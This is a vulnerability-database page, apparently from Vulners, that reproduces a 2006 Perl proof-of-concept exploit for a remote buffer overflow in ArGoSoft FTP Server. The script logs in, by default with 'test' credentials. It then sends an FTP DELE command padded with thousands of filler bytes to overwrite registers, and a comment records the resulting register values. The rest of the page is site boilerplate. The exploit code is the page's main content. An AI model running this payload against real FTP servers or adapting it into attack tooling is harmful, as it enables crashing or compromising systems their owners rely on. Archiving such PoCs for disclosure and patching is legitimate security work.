Lucene search
K

ArGoSoft FTP Server <= 1.4.3.5 - Remote Buffer Overflow PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 11 Views

Remote Buffer Overflow in ArGoSoft FTP Server version 1.4.3.

Code

                                                #!/usr/bin/perl

# ---------------------------------------------------- #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias                           	       #
# ---------------------------------------------------- #

use Net::FTP;

# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

# ===========

if (($host) && ($port)) {

# make exploit string
$exploit_string = &#34;DELE &#34;;
$exploit_string .= &#34;A&#34; x 2041;
$exploit_string .= &#34;B&#34; x 4;
$exploit_string .= &#34;C&#34; x 1026;

#    On Win2K SP4 FR:
#    EAX 42424241
#    ECX 43434343
#    EDX 43434342
#    EBX 43434B73

       # ===================

       print &#34;Trying to connect to $host:$port\n&#34;;
       $sock = Net::FTP-&#62;new(&#34;$host&#34;,Port =&#62; $port, TimeOut =&#62; 30, Debug=&#62; $debug) or die &#34;[-] Connection failed\n&#34;;
       print &#34;[+] Connect OK!\n&#34;;
       print &#34;Logging...\n&#34;;
       if (!$user) {
            $user = &#34;test&#34;;
            $pass = &#34;test&#34;;
       }
       $sock-&#62;login($user, $pass);
       $answer = $sock-&#62;message;
       print &#34;Sending string...\n&#34;;
       $sock-&#62;quot($exploit_string);
} else {
       print &#34;ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n&#34;;
}

# milw0rm.com [2006-02-25]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
11